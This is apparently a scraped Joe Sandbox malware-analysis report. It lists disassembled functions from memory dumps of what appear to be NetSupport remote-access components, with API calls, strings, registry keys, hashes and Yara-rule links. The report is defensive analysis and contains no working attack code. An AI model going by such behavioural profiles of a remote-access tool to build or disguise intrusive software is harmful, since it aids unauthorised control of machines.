Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50

Function 1100FDC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
__CxxThrowException@8.LIBCMT ref: 1100FEA2
std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF

Strings

bad cast, xrefs: 1100FE8C

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92

Function 6D1D2F80 Relevance: 10.6, APIs: 7, Instructions: 115COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 6D1D2FBB
GetTickCount.KERNEL32 ref: 6D1D300D
InterlockedExchange.KERNEL32(-00039761,00000000), ref: 6D1D301B
_calloc.LIBCMT ref: 6D1D303B
_memmove.LIBCMT ref: 6D1D3049
InterlockedDecrement.KERNEL32(-000397B9), ref: 6D1D307F
SetEvent.KERNEL32(0000031C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,92DF34B3), ref: 6D1D308C

Part of subcall function 6D1D28D0: wsprintfA.USER32 ref: 6D1D2965

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
String ID:
API String ID: 3178096747-0
Opcode ID: fc0f1a9b91511f52eec3b8ec6e9eefc82a38413eaeeca4bfa385fabcfc8938e2
Instruction ID: dff48f52fe1e3450a47f7e494c9e2b74ae75926067da91b5c7a53c071049e8e1
Opcode Fuzzy Hash: fc0f1a9b91511f52eec3b8ec6e9eefc82a38413eaeeca4bfa385fabcfc8938e2
Instruction Fuzzy Hash: 0D4186B6C04209AFDB40CFE9C844AEFB7F8EF48304F01851AE519E7244E7B59605CBA1

Function 11107290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
std::exception::exception.LIBCMT ref: 11107414
__CxxThrowException@8.LIBCMT ref: 11107429

Strings

Wtsapi32.dll, xrefs: 1110735E
Advapi32.dll, xrefs: 11107365

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID: Advapi32.dll$Wtsapi32.dll
API String ID: 2851125068-2390547818
Opcode ID: df44ccd14827e7239b96b436232c94f88ea3ff84a8a331e5a92631cd758ff476
Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
Opcode Fuzzy Hash: df44ccd14827e7239b96b436232c94f88ea3ff84a8a331e5a92631cd758ff476
Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56

Function 11017300 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000328,000000FF), ref: 1101733C
CoInitialize.OLE32(00000000), ref: 11017345
_GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
CoUninitialize.COMBASE ref: 110173D0

Strings

PCSystemTypeEx, xrefs: 1101737C
Win32_ComputerSystem, xrefs: 1101735D

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleStringUninitializeW@16Wait
String ID: PCSystemTypeEx$Win32_ComputerSystem
API String ID: 2407233060-578995875
Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1

Function 11017220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000328,000000FF), ref: 11017252
CoInitialize.OLE32(00000000), ref: 1101725B
_GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
CoUninitialize.COMBASE ref: 110172E0

Strings

ChassisTypes, xrefs: 11017292
Win32_SystemEnclosure, xrefs: 11017273

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: InitializeObjectSingleStringUninitializeW@16Wait
String ID: ChassisTypes$Win32_SystemEnclosure
API String ID: 2407233060-2037925671
Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761

Function 6D1C9C49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleeptimenetworkCOMMON

Download Yara Rule

APIs

send.WSOCK32(?,?,?,00000000), ref: 6D1C9C93
timeGetTime.WINMM(?,?,?,00000000), ref: 6D1C9CD0
Sleep.KERNEL32(00000000), ref: 6D1C9CDE
LeaveCriticalSection.KERNEL32(?), ref: 6D1C9D4F
InterlockedIncrement.KERNEL32(?), ref: 6D1C9D72

Strings

3', xrefs: 6D1C9CB2

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
String ID: 3'
API String ID: 77915721-280543908
Opcode ID: 8622c27eb31cd7b1fb7b71e543663e3d6d70be982e70730291036e454262f58c
Instruction ID: f52b164e3a103b44cb0cd9a8a1f91a895835127e74a2fb357f83f4cbb1891f9b
Opcode Fuzzy Hash: 8622c27eb31cd7b1fb7b71e543663e3d6d70be982e70730291036e454262f58c
Instruction Fuzzy Hash: 17219371A041198FDB20CF64DC98BAAB3B4EF15329F0182D5E90DA7249DB78DD84CF92

Function 11025D00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69

Strings

GetProcessImageFileNameA, xrefs: 11025D10
GetModuleFileNameExA, xrefs: 11025D40

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorFileImageLastNameProcess
String ID: GetModuleFileNameExA$GetProcessImageFileNameA
API String ID: 4186647306-532032230
Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4

Function 1110F2B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7736C3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321

Strings

hThread, xrefs: 1110F300
..\ctl32\Refcount.cpp, xrefs: 1110F2FB

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID: ..\ctl32\Refcount.cpp$hThread
API String ID: 3360349984-1136101629
Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64

Function 11031960 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110319A7

Strings

301389, xrefs: 1103198E
_HW, xrefs: 11031970
_HF, xrefs: 11031988, 1103198D
_SW, xrefs: 1103197C
%s%s%s.bin, xrefs: 110319A1

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s%s%s.bin$301389$_HF$_HW$_SW
API String ID: 2111968516-3199141679
Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6

Function 6D1D6940 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 6D1D6950

Part of subcall function 6D1D7BE0: _memset.LIBCMT ref: 6D1D7BFF
Part of subcall function 6D1D7BE0: _strncpy.LIBCMT ref: 6D1D7C0B

Part of subcall function 6D1CA4E0: EnterCriticalSection.KERNEL32(6D20B898,00000000,?,?,?,6D1CDA7F,?,00000000), ref: 6D1CA503
Part of subcall function 6D1CA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6D1CA568
Part of subcall function 6D1CA4E0: Sleep.KERNEL32(00000000,?,6D1CDA7F,?,00000000), ref: 6D1CA581
Part of subcall function 6D1CA4E0: LeaveCriticalSection.KERNEL32(6D20B898,00000000), ref: 6D1CA5B3

Strings

Publish %d pending services, xrefs: 6D1D6AAF
Client, xrefs: 6D1D6AE2
Channel, xrefs: 6D1D6ADD
1.2, xrefs: 6D1D6998

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
String ID: 1.2$Channel$Client$Publish %d pending services
API String ID: 1112461860-1140593649
Opcode ID: cc15f54f6cd04cfc717ad1222bb57eac17940993620a074c6ecac94511d593fd
Instruction ID: b984e2f640caad37b0c177e483fa89b13f92875f0651760eeace9f902c23a4c5
Opcode Fuzzy Hash: cc15f54f6cd04cfc717ad1222bb57eac17940993620a074c6ecac94511d593fd
Instruction Fuzzy Hash: E651C5B1A0820E8FDB50DF78D898B7B77B4AB6670CF10012DD99183289DBB59445DBF2

Function 11145330 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
RegCloseKey.ADVAPI32(?), ref: 11145404

Strings

SOFTWARE\Productive Computer Insight\PCICTL, xrefs: 11145367, 1114539E
ForceRTL, xrefs: 111453C3
SOFTWARE\NetSupport Ltd\PCICTL, xrefs: 11145380

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
API String ID: 47109696-3245241687
Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0

Function 111114D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9

GetComputerNameA.KERNEL32(?,?), ref: 11111578

Strings

ACM, xrefs: 11111532
\Registry\Machine\SOFTWARE\Classes\N%x, xrefs: 11111520
, xrefs: 11111571
\Registry\Machine\SOFTWARE\Classes\N%x.%s, xrefs: 11111587

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

